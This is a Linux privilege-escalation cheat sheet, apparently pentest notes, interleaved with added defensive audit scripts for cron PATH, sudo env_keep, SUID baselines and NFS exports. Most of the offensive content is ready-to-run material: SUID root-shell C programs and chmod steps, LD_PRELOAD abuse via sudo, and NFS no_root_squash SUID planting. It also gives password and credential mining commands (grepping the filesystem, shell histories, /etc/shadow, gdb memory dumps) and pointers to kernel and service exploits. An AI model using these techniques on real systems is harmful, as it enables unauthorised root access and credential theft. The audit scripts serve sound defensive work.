Privilege escalation

MSF

post/multi/recon/local_exploit_suggester

Enumeration

https://cs.piosky.fr/enumeration/unix/

Crontab

User-level - /var/spool/cron/crontabs
System-level - /etc/crontab

$PATH redefinition
files found in the left-most defined path take precedence in the search order
File overwrite / file missing
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
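Added example, not from the original page: a small audit covering the two cron weaknesses listed above, a command written as a bare name (resolved through the crontab PATH, left-most directory first) and a cron script that group or other users can write. The crontab text and function names are this example's own; on a real host feed it /etc/crontab, the files under /etc/cron.d or the output of crontab -l.

```shell
#!/bin/sh
# Added example (not from the original page): audit crontab lines for a
# command given as a bare name (looked up through the crontab PATH, left-most
# directory first) and for a script file writable by group or other users.
# The crontab text below is constructed for the example.

SAMPLE_CRONTAB='# constructed sample in system crontab format (user field present)
PATH=/opt/scripts:/usr/bin:/bin
* * * * *   root  backup.sh
*/5 * * * * root  /usr/local/bin/cleanup.sh
0 3 * * *   root  /opt/scripts/rotate.sh --quiet'

# cron_path TEXT: PATH defined in the crontab (empty when it inherits the default)
cron_path() {
  printf '%s\n' "$1" | sed -n 's/^PATH=//p' | tail -n 1
}

# cron_commands TEXT: "user command" per schedule line, skipping comments,
# blank lines and variable assignments (PATH=, SHELL=, MAILTO=, ...)
cron_commands() {
  printf '%s\n' "$1" | awk '
    /^[[:space:]]*#/ { next }
    NF == 0 { next }
    /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
    NF >= 7 { print $6, $7 }'
}

# relative_cron_commands TEXT: commands that are not absolute paths, so cron
# has to look them up through PATH
relative_cron_commands() {
  cron_commands "$1" | awk '$2 !~ /^\// { print $2 }'
}

# first_dir_providing CMD PATHSTR: first PATH directory holding CMD, or
# "unresolved"; whoever can write that directory controls what cron runs
first_dir_providing() {
  cmd=$1
  oldifs=$IFS
  IFS=':'
  for d in $2; do
    if [ -f "$d/$cmd" ]; then
      IFS=$oldifs
      printf '%s\n' "$d"
      return 0
    fi
  done
  IFS=$oldifs
  printf 'unresolved\n'
}

# writable_by_others FILE: "writable" when the group or other write bit is set
writable_by_others() {
  if [ -e "$1" ] && [ -n "$(find "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]; then
    printf 'writable\n'
  else
    printf 'ok\n'
  fi
}

# Walk the sample: report bare command names and where PATH resolves them
for c in $(relative_cron_commands "$SAMPLE_CRONTAB"); do
  printf '%s -> %s\n' "$c" "$(first_dir_providing "$c" "$(cron_path "$SAMPLE_CRONTAB")")"
done
```

For the sample crontab the loop reports backup.sh as unresolved unless /opt/scripts/backup.sh exists; the remediation is an absolute path in the crontab and a cron PATH made of root-owned, non-writable directories.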

Spot short-lived processes

#!/bin/bash
# Print the change in the process list once per second, to catch
# short-lived jobs (cron tasks, scripts) that a single ps would miss

IFS=$'\n'

old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process")
  sleep 1
  old_process=$new_process
done

Tricks

su root (creds reuse)
sudo -u <user> bash -i
ls -lahR /home
strace <executable_file> 2>&1 | grep -i -E "open|access|no such file"

Startup scripts

find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'

Rights on files

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -777 -type f 2>/dev/null    # Open permissions 

Writable files for user or group

find / -perm /u=w -user "$(whoami)" 2>/dev/null
find / -perm /u+w,g+w -type f -user "$(whoami)" 2>/dev/null
find / -perm /u+w -user "$(whoami)" 2>/dev/null

Writable directories for user or group

find / -perm /u=w -type d -user "$(whoami)" 2>/dev/null
find / -perm /u+w,g+w -type d -user "$(whoami)" 2>/dev/null

Password Mining

history
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
ls -l /etc/passwd
ls -l /etc/shadow
grep -RiIn passw / 2>/dev/null
grep -rnw '/' -ie 'pass' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASS' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASSWORD' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_USER' --color=always 2>/dev/null | grep -vi binary
gdb -p <pid>
info proc mappings
dump memory <out_file> <start_mem_region> <stop_mem_region>

LD_PRELOAD / LD_LIBRARY_PATH

Detection

sudo -l
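Added example, not from the original page: a check over the "Matching Defaults" part of sudo -l output for env_keep entries that preserve LD_PRELOAD or LD_LIBRARY_PATH, which is what makes the technique in this section possible (sudo's default env_reset strips every LD_* variable unless an env_keep entry lists it). The two sudo -l outputs inside the script are constructed approximations and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): scan `sudo -l` output for
# env_keep entries that keep LD_PRELOAD or LD_LIBRARY_PATH. The two outputs
# below are constructed for the example; on a real host use `sudo -l`.

SAMPLE_SUDO_L_RISKY='Matching Defaults entries for alice on host1:
    env_reset, env_keep+=LD_PRELOAD, env_keep+="LD_LIBRARY_PATH", mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/find'

SAMPLE_SUDO_L_CLEAN='Matching Defaults entries for bob on host1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User bob may run the following commands on host1:
    (root) /usr/bin/systemctl restart nginx'

# sudo_env_keep_loader_vars TEXT: print each dynamic-loader variable kept by
# an env_keep entry, one per line, sorted (prints nothing when none is kept)
sudo_env_keep_loader_vars() {
  printf '%s\n' "$1" \
    | grep -o 'env_keep[^,]*' \
    | grep -o 'LD_PRELOAD\|LD_LIBRARY_PATH' \
    | sort -u
}

# sudo_env_keep_status TEXT: "risky" when a loader variable is kept, "ok"
# otherwise; the fix is to remove that variable from env_keep in sudoers
sudo_env_keep_status() {
  if [ -n "$(sudo_env_keep_loader_vars "$1")" ]; then
    printf 'risky\n'
  else
    printf 'ok\n'
  fi
}

printf 'alice: %s\n' "$(sudo_env_keep_status "$SAMPLE_SUDO_L_RISKY")"
printf 'bob: %s\n' "$(sudo_env_keep_status "$SAMPLE_SUDO_L_CLEAN")"
```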

Exploitation

1) Set LD_PRELOAD to point to the .so file
2) sudo LD_PRELOAD=<full_path_to_so_file> <program>

SetUID

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* root.c: when the binary is SUID root, drop into a root shell */
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
  return 0;
}

#include <stdio.h>
#include <unistd.h>

/* variant using execl instead of system(); the argument list ends with NULL */
int main(void)
{
  setuid(0);
  execl("/bin/sh", "sh", (char *)NULL);
  return 0;
}

gcc -o /var/tmp/root root.c
chown root:root /var/tmp/root && chmod 4777 /var/tmp/root

cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p
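Added example, not from the original page: the find commands from "Rights on files" and "Writable files" turned into a small audit that lists SUID/SGID and world-writable files under a directory and diffs the SUID list against a saved baseline, so that an artifact like the /tmp/root_shell copy above shows up as new. The root directory and baseline file are parameters; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): list SUID/SGID and
# world-writable regular files under a directory and report SUID/SGID files
# missing from a baseline. Usage: new_since_baseline BASELINE_FILE ROOT

# list_suid ROOT: regular files with the SUID or SGID bit set, sorted
list_suid() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# list_world_writable ROOT: regular files writable by everyone, sorted
list_world_writable() {
  find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# save_baseline ROOT FILE: store the current SUID/SGID list (one path per
# line, sorted, which is what comm needs)
save_baseline() {
  list_suid "$1" > "$2"
  chmod 0644 "$2"
}

# new_since_baseline BASELINE_FILE ROOT: SUID/SGID files present now but
# absent from the baseline
new_since_baseline() {
  list_suid "$2" | comm -13 "$1" -
}

# Stand-alone use: audit / against a baseline kept outside the host's reach
if [ -z "$PRIVESC_AUDIT_NO_MAIN" ]; then
  baseline=${1:-/var/lib/suid-baseline.txt}
  if [ -r "$baseline" ]; then
    new_since_baseline "$baseline" /
  else
    printf 'no baseline at %s; create one with save_baseline / %s\n' "$baseline" "$baseline" >&2
  fi
fi
```

A baseline is only useful if it is taken on a known-good system and stored where a local attacker cannot edit it; a change such as a new entry under /tmp or /var/tmp is the signal to investigate.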

Specific vulnerabilities

Dirty c0w

https://dirtycow.ninja/

Sudo on apache2

apache2 -f /etc/shadow

MySQL

https://web.archive.org/web/20170716101504/https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/

Exim

Detection

dpkg -l | grep -i exim (<4.86.2)
exim -bV -v | grep -i perl (perl compiled)
head /etc/exim.conf (perl_startup option)

Exploitation

exploit/unix/local/exim_perl_startup

Nginx (CVE-2016-1247)

Detection

dpkg -l

Exploit

https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

NFS

Detection

cat /etc/exports => looking for no_root_squash
add no_root_squash if /etc/exports is writable

Exploitation

1) Mount the nfs export to the local linux system
2) As root (on the localhost), compile an executable and place it in the mounted directory
3) Set 'suid' permissions to the executable
4) Run the file on the NFS server
showmount -e <ip>
chown root:root sid-shell; chmod +s sid-shell
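Added example, not from the original page: a parser for /etc/exports text that reports every client entry exported with no_root_squash, the setting the detection step above looks for, and separately the rw exports among them, the combination that lets a remote root write root-owned files on the share. The exports text is constructed and the function names are this example's own; on a real server pass in /etc/exports and the files under /etc/exports.d.

```shell
#!/bin/sh
# Added example (not from the original page): parse /etc/exports text and
# print "path client options" for each client entry carrying no_root_squash.
# The exports text below is constructed for the example.

SAMPLE_EXPORTS='# constructed sample
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash) *(ro,sync)
/srv/public   *(ro,sync,root_squash)
/srv/iso      10.0.0.5(ro,no_root_squash)
/srv/dev      192.168.1.10(rw,no_root_squash,insecure)'

# exports_without_root_squash TEXT: one line per client entry that disables
# root squashing; each exports line is "path client(options) client(options)..."
exports_without_root_squash() {
  printf '%s\n' "$1" | awk '
    /^[[:space:]]*#/ { next }
    NF == 0 { next }
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        n = split($i, parts, "(")        # client(options)
        client = parts[1]
        opts = (n > 1) ? parts[2] : ""
        sub(/\)$/, "", opts)
        if (("," opts ",") ~ /,no_root_squash,/)
          print path, client, opts
      }
    }'
}

# exports_rw_without_root_squash TEXT: same, restricted to read-write exports
exports_rw_without_root_squash() {
  exports_without_root_squash "$1" | awk '("," $3 ",") ~ /,rw,/'
}

printf 'no_root_squash exports:\n'
exports_without_root_squash "$SAMPLE_EXPORTS"
printf 'rw + no_root_squash exports:\n'
exports_rw_without_root_squash "$SAMPLE_EXPORTS"
```

For the sample, /srv/backup (from 10.0.0.0/24) and /srv/dev are flagged in both lists and /srv/iso only in the first; the fix is to drop no_root_squash (root_squash is the default) or restrict the export to ro and to specific hosts.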

Resources

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://guif.re/linuxeop
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

Tools

https://github.com/rebootuser/LinEnum
https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
http://www.securitysift.com/download/linuxprivchecker.py
https://github.com/1N3/PrivEsc/tree/master/linux